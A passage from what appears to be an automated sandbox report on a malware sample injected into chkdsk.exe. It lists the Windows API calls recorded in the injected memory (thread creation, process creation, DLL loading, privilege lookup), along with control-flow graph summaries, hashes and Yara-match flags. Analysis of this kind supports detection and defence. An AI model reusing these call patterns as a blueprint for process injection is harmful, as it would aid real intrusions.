                    • Instruction Fuzzy Hash: C0F09AB12042046FDB08EFA8DC46EA737A8EF88754F154599F94997242D632E821CAA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 299 98a670-98a6a1 call 98af60 RtlFreeHeap
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00973AF8), ref: 0098A69D
                    Strings
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction ID: 38a9e8034b7255c59a01c7aeb00b3c75015277af5c1f5c22b343de18f3a4afe9
                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction Fuzzy Hash: D2E012B1200208ABDB18EF99CC49EA777ACEF88750F118559BA085B242C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 302 978309-97831f 303 978328-97835a call 98ca00 call 97acf0 call 984e50 302->303 304 978323 call 98be60 302->304 311 97838e-978392 303->311 312 97835c-97836e PostThreadMessageW 303->312 304->303 313 978370-97838b call 97a480 PostThreadMessageW 312->313 314 97838d 312->314 313->314 314->311
                    APIs
                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0097836A
                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0097838B
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: 0c07ca6d561cbc13e1d0ca8054e80bf43c818137af7cb6f9dcc269c8ba9bb810
                    • Instruction ID: 35c425030b00d938955f07d7346755a0fb85b87d939a9258d4f2f93397de877d
                    • Opcode Fuzzy Hash: 0c07ca6d561cbc13e1d0ca8054e80bf43c818137af7cb6f9dcc269c8ba9bb810
                    • Instruction Fuzzy Hash: 8101D872A802287AE721A6549C47FFE7B6C5B81F50F044159FB08FA1C2EAA5690643F5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0097836A
                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0097838B
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction ID: 51297bbe79b4a5365d8e3cbf74b695a706c610c111ef93bd833ebfe02638c70a
                    • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction Fuzzy Hash: E5018432A8022876E721A6949C47FBE776C5B80F50F054114FF08BA1C2EAA4690647F6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 527 9891fd-9891fe 528 989200-989216 527->528 529 9891b5 527->529 532 989218-989221 528->532 533 989233-98923a 528->533 530 9891bf-9891cb 529->530 531 9891b7-9891be 529->531 536 9891d1-9891d8 530->536 537 9891cc call 984e50 530->537 531->530 532->533 538 989223-98922a 532->538 534 98931d-989320 533->534 535 989240-989309 call 98bde0 * 2 call 98c0b0 call 98bde0 call 98c0b0 call 98bde0 * 2 533->535 535->534 558 98930b-989314 535->558 539 9891da-9891f6 call 98f232 CreateThread 536->539 540 9891f7-9891fc 536->540 537->536 538->535 542 98922c 538->542 542->533 558->534 559 989316 558->559 559->534
                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0097F050,?,?,00000000), ref: 009891EC
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: 9a0170185c0a4a3a8923a2e002a0a9d1954acb4c82b0f1228da01d3994156eab
                    • Instruction ID: bd05b112a7314cc94888617021a0ffe7faa61ddf79b392cbce6dd2649cefb7d8
                    • Opcode Fuzzy Hash: 9a0170185c0a4a3a8923a2e002a0a9d1954acb4c82b0f1228da01d3994156eab
                    • Instruction Fuzzy Hash: D8418EB2600705BBD728EF64CC86FE7B3ADAF84754F084519F529A6281DB70B910CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0097F1D2,0097F1D2,?,00000000,?,?), ref: 0098A800
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: d3119b5c73f54f3ba433edfa66199bd4a4ef9ced07f66cce4e82a4cdb5906f48
                    • Instruction ID: 7398fb05aed0898425802372c36a06576eef14bda2c3781a70efd5472e393c10
                    • Opcode Fuzzy Hash: d3119b5c73f54f3ba433edfa66199bd4a4ef9ced07f66cce4e82a4cdb5906f48
                    • Instruction Fuzzy Hash: 3F11A1B52002486FDB10DF69DC41FEB3BA8EF89754F11828AFA0C97242C530E814CBB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0097AD62
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: 80b961271b7123437e2168619b3c9bf36ed877748772c33ed68eab7ee4668e45
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: 8D011EB6D0020DABDF10EAA4DC42FDDB3789B94308F108595A90D97681F631EB148B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0098A734
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction ID: 37f53952dd154f60d20cff611de0b84638269bf66c222cc4ef2e957dde82c40a
                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction Fuzzy Hash: 1F01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00978D14,?), ref: 0097F6FB
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: c0e6240d4f4ac3b4a7ec792f104f2f1a853901e7efa96a31c1a5bc458cb13744
                    • Instruction ID: 069c2584beb29c05cbbc92bd596a41f108a6211e684dfd18c15537176cccf41b
                    • Opcode Fuzzy Hash: c0e6240d4f4ac3b4a7ec792f104f2f1a853901e7efa96a31c1a5bc458cb13744
                    • Instruction Fuzzy Hash: 81F0522320530A6BEB10EB60DC13FAA7B88DB81780F0D45B9F80DDB283E829E600C341
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0097F050,?,?,00000000), ref: 009891EC
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: ddd11cde9aaf76e4a64e768996f8cd04ed7714866a9f477089f933a3bced0f9e
                    • Instruction ID: 2884808204849e850430a19a60d93d676cfb34e5602a8a493a24184bb8e9e072
                    • Opcode Fuzzy Hash: ddd11cde9aaf76e4a64e768996f8cd04ed7714866a9f477089f933a3bced0f9e
                    • Instruction Fuzzy Hash: 20E06D773802043AE2207599AC02FA7B29C9B81B20F15002AFA0DEA2C1D995F80142A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlAllocateHeap.NTDLL(00984536,?,00984CAF,00984CAF,?,00984536,?,?,?,?,?,00000000,00000000,?), ref: 0098A65D
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction ID: ddbdcdf613e063e51f3523ca0641fc2d205429677cd4fa8f72849019900cc534
                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction Fuzzy Hash: A1E012B1200208ABDB14EF99CC41EA777ACEF88654F118559BA085B242C630F9108BB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0097F1D2,0097F1D2,?,00000000,?,?), ref: 0098A800
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction ID: 9d86a6a2cb84701a657daa78fbb4904f5aaa89e46708e1535974f8aab14461b3
                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction Fuzzy Hash: 38E01AB12002086BDB10EF49CC85EE737ADEF88650F118155BA0857241C934E8108BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00978D14,?), ref: 0097F6FB
                    Memory Dump Source
                    • Source File: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Offset: 00970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_970000_chkdsk.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction ID: fe5e05e1daf93e60fd9f5a62274f82f312c0c9ce611fffd9a8d84ed91528cd18
                    • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction Fuzzy Hash: 11D05E626503092AE610BAA49C13F2632CC6B44B00F4A4064FA48A63C3E950E4014165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 43234b756b26650c74038b38dcf0dbcfca1c13e0838c5ce579dc08f45d4212e0
                    • Instruction ID: 444177b2eeefec498c82d4b4b547090d12bb8b07356422b7c56220e6a154f514
                    • Opcode Fuzzy Hash: 43234b756b26650c74038b38dcf0dbcfca1c13e0838c5ce579dc08f45d4212e0
                    • Instruction Fuzzy Hash: 6CB09B72D054C5C5D611D7A14708B277A117BD0751F66C062D2020645A47B8C095F6B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E0544FDDA(intOrPtr* __edx, intOrPtr _a4) {
                    				void* _t7;
                    				intOrPtr _t9;
                    				intOrPtr _t10;
                    				intOrPtr* _t12;
                    				intOrPtr* _t13;
                    				intOrPtr _t14;
                    				intOrPtr* _t15;
                    
                    				_t13 = __edx;
                    				_push(_a4);
                    				_t14 =  *[fs:0x18];
                    				_t15 = _t12;
                    				_t7 = E053FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                    				_push(_t13);
                    				E05445720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                    				_t9 =  *_t15;
                    				if(_t9 == 0xffffffff) {
                    					_t10 = 0;
                    				} else {
                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                    				}
                    				_push(_t10);
                    				_push(_t15);
                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                    				return E05445720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                    			}











                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0544FDFA
                    Strings
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0544FE2B
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0544FE01
                    Memory Dump Source
                    • Source File: 00000010.00000002.508367712.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: true
                    • Associated: 00000010.00000002.508814264.00000000054AB000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 00000010.00000002.508832539.00000000054AF000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_16_2_5390000_chkdsk.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: 354feeccfafbaa4e9a35eac87c44809d597df7d6ad7adc91df1265421a6f7b18
                    • Instruction ID: e3ca9cf00913cc9aeb95dbb4bac1299b517dd30a3e3316f07a7774bc24c9bcdc
                    • Opcode Fuzzy Hash: 354feeccfafbaa4e9a35eac87c44809d597df7d6ad7adc91df1265421a6f7b18
                    • Instruction Fuzzy Hash: 44F0F636284201BFEB201A45DC06FA3BB5AEB44731F244315F628566E1DA62F8209BF0
                    Uniqueness

                    Uniqueness Score: -1.00%